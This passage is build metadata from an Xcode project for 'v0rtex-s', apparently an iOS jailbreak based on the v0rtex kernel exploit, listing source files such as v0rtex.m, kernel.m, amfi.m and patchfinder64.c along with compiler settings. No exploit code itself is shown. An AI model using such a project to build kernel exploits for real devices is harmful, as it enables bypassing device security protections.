PBXSourcesBuildPhase; 242 | buildActionMask = 2147483647; 243 
| files = ( 244 | B58B32491FE4F3DF00EB7B47 /* root-rw.m in Sources */, 245 | B58B32401FE4EBA300EB7B47 /* kernel.m in Sources */, 246 | B58B32461FE4ED6300EB7B47 /* symbols.m in Sources */, 247 | EE5252B11FDA4F2F00993801 /* ViewController.m in Sources */, 248 | EE5252BC1FDA4F2F00993801 /* main.m in Sources */, 249 | 82EDD2FE1FF670A5003D49F5 /* jailbreakd.m in Sources */, 250 | EE5252AE1FDA4F2F00993801 /* AppDelegate.m in Sources */, 251 | 82178E0A1FEAFAF3002975CE /* amfi.m in Sources */, 252 | 820EF06A1FEAB30D006104ED /* patchfinder64.c in Sources */, 253 | EE5169281FDC2A7000805460 /* v0rtex.m in Sources */, 254 | ); 255 | runOnlyForDeploymentPostprocessing = 0; 256 | }; 257 | /* End PBXSourcesBuildPhase section */ 258 | 259 | /* Begin PBXVariantGroup section */ 260 | EE5252B21FDA4F2F00993801 /* Main.storyboard */ = { 261 | isa = PBXVariantGroup; 262 | children = ( 263 | EE5252B31FDA4F2F00993801 /* Base */, 264 | ); 265 | name = Main.storyboard; 266 | sourceTree = ""; 267 | }; 268 | EE5252B71FDA4F2F00993801 /* LaunchScreen.storyboard */ = { 269 | isa = PBXVariantGroup; 270 | children = ( 271 | EE5252B81FDA4F2F00993801 /* Base */, 272 | ); 273 | name = LaunchScreen.storyboard; 274 | sourceTree = ""; 275 | }; 276 | /* End PBXVariantGroup section */ 277 | 278 | /* Begin XCBuildConfiguration section */ 279 | EE5252BD1FDA4F2F00993801 /* Debug */ = { 280 | isa = XCBuildConfiguration; 281 | buildSettings = { 282 | ALWAYS_SEARCH_USER_PATHS = YES; 283 | CLANG_ANALYZER_NONNULL = YES; 284 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 285 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 286 | CLANG_CXX_LIBRARY = "libc++"; 287 | CLANG_ENABLE_MODULES = YES; 288 | CLANG_ENABLE_OBJC_ARC = YES; 289 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 290 | CLANG_WARN_BOOL_CONVERSION = YES; 291 | CLANG_WARN_COMMA = YES; 292 | CLANG_WARN_CONSTANT_CONVERSION = YES; 293 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 294 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 295 | 
CLANG_WARN_EMPTY_BODY = YES; 296 | CLANG_WARN_ENUM_CONVERSION = YES; 297 | CLANG_WARN_INFINITE_RECURSION = YES; 298 | CLANG_WARN_INT_CONVERSION = YES; 299 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 300 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 301 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 302 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 303 | CLANG_WARN_STRICT_PROTOTYPES = YES; 304 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 305 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 306 | CLANG_WARN_UNREACHABLE_CODE = YES; 307 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 308 | CODE_SIGN_IDENTITY = "iPhone Developer"; 309 | COPY_PHASE_STRIP = NO; 310 | DEBUG_INFORMATION_FORMAT = dwarf; 311 | ENABLE_STRICT_OBJC_MSGSEND = YES; 312 | ENABLE_TESTABILITY = YES; 313 | GCC_C_LANGUAGE_STANDARD = gnu11; 314 | GCC_DYNAMIC_NO_PIC = NO; 315 | GCC_NO_COMMON_BLOCKS = YES; 316 | GCC_OPTIMIZATION_LEVEL = 0; 317 | GCC_PREPROCESSOR_DEFINITIONS = ( 318 | "DEBUG=1", 319 | "$(inherited)", 320 | ); 321 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 322 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 323 | GCC_WARN_UNDECLARED_SELECTOR = YES; 324 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 325 | GCC_WARN_UNUSED_FUNCTION = YES; 326 | GCC_WARN_UNUSED_VARIABLE = YES; 327 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 328 | MTL_ENABLE_DEBUG_INFO = YES; 329 | ONLY_ACTIVE_ARCH = YES; 330 | SDKROOT = iphoneos; 331 | USER_HEADER_SEARCH_PATHS = "/Users/sticktron/theos/include/**"; 332 | }; 333 | name = Debug; 334 | }; 335 | EE5252BE1FDA4F2F00993801 /* Release */ = { 336 | isa = XCBuildConfiguration; 337 | buildSettings = { 338 | ALWAYS_SEARCH_USER_PATHS = YES; 339 | CLANG_ANALYZER_NONNULL = YES; 340 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 341 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 342 | CLANG_CXX_LIBRARY = "libc++"; 343 | CLANG_ENABLE_MODULES = YES; 344 | CLANG_ENABLE_OBJC_ARC = YES; 345 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 346 | CLANG_WARN_BOOL_CONVERSION = YES; 347 | CLANG_WARN_COMMA = 
YES; 348 | CLANG_WARN_CONSTANT_CONVERSION = YES; 349 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 350 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 351 | CLANG_WARN_EMPTY_BODY = YES; 352 | CLANG_WARN_ENUM_CONVERSION = YES; 353 | CLANG_WARN_INFINITE_RECURSION = YES; 354 | CLANG_WARN_INT_CONVERSION = YES; 355 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 356 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 357 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 358 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 359 | CLANG_WARN_STRICT_PROTOTYPES = YES; 360 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 361 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 362 | CLANG_WARN_UNREACHABLE_CODE = YES; 363 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 364 | CODE_SIGN_IDENTITY = "iPhone Developer"; 365 | COPY_PHASE_STRIP = NO; 366 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 367 | ENABLE_NS_ASSERTIONS = NO; 368 | ENABLE_STRICT_OBJC_MSGSEND = YES; 369 | GCC_C_LANGUAGE_STANDARD = gnu11; 370 | GCC_NO_COMMON_BLOCKS = YES; 371 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 372 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 373 | GCC_WARN_UNDECLARED_SELECTOR = YES; 374 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 375 | GCC_WARN_UNUSED_FUNCTION = YES; 376 | GCC_WARN_UNUSED_VARIABLE = YES; 377 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 378 | MTL_ENABLE_DEBUG_INFO = NO; 379 | SDKROOT = iphoneos; 380 | USER_HEADER_SEARCH_PATHS = "/Users/sticktron/theos/include/**"; 381 | VALIDATE_PRODUCT = YES; 382 | }; 383 | name = Release; 384 | }; 385 | EE5252C01FDA4F2F00993801 /* Debug */ = { 386 | isa = XCBuildConfiguration; 387 | buildSettings = { 388 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 389 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 390 | CODE_SIGN_STYLE = Automatic; 391 | DEVELOPMENT_TEAM = 22G2QV87A2; 392 | ENABLE_BITCODE = NO; 393 | INFOPLIST_FILE = "$(SRCROOT)/v0rtex-S/Info.plist"; 394 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 395 | LIBRARY_SEARCH_PATHS = ( 396 | 
"$(inherited)", 397 | "$(PROJECT_DIR)/v0rtex-S/the_super_fun_part", 398 | ); 399 | PRODUCT_BUNDLE_IDENTIFIER = com.sticktron.v0rtexroot; 400 | PRODUCT_NAME = "$(TARGET_NAME)"; 401 | PROVISIONING_PROFILE_SPECIFIER = ""; 402 | TARGETED_DEVICE_FAMILY = "1,2"; 403 | }; 404 | name = Debug; 405 | }; 406 | EE5252C11FDA4F2F00993801 /* Release */ = { 407 | isa = XCBuildConfiguration; 408 | buildSettings = { 409 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 410 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 411 | CODE_SIGN_STYLE = Automatic; 412 | DEVELOPMENT_TEAM = 22G2QV87A2; 413 | ENABLE_BITCODE = NO; 414 | INFOPLIST_FILE = "$(SRCROOT)/v0rtex-S/Info.plist"; 415 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 416 | LIBRARY_SEARCH_PATHS = ( 417 | "$(inherited)", 418 | "$(PROJECT_DIR)/v0rtex-S/the_super_fun_part", 419 | ); 420 | PRODUCT_BUNDLE_IDENTIFIER = com.sticktron.v0rtexroot; 421 | PRODUCT_NAME = "$(TARGET_NAME)"; 422 | PROVISIONING_PROFILE_SPECIFIER = ""; 423 | TARGETED_DEVICE_FAMILY = "1,2"; 424 | }; 425 | name = Release; 426 | }; 427 | /* End XCBuildConfiguration section */ 428 | 429 | /* Begin XCConfigurationList section */ 430 | EE5252A41FDA4F2F00993801 /* Build configuration list for PBXProject "v0rtex-s" */ = { 431 | isa = XCConfigurationList; 432 | buildConfigurations = ( 433 | EE5252BD1FDA4F2F00993801 /* Debug */, 434 | EE5252BE1FDA4F2F00993801 /* Release */, 435 | ); 436 | defaultConfigurationIsVisible = 0; 437 | defaultConfigurationName = Release; 438 | }; 439 | EE5252BF1FDA4F2F00993801 /* Build configuration list for PBXNativeTarget "v0rtex" */ = { 440 | isa = XCConfigurationList; 441 | buildConfigurations = ( 442 | EE5252C01FDA4F2F00993801 /* Debug */, 443 | EE5252C11FDA4F2F00993801 /* Release */, 444 | ); 445 | defaultConfigurationIsVisible = 0; 446 | defaultConfigurationName = Release; 447 | }; 448 | /* End XCConfigurationList section */ 449 | }; 450 | rootObject = EE5252A11FDA4F2F00993801 /* Project object */; 451 
| } 452 | -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-s.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 8 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | v0rtex.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | --------------------------------------------------------------------------------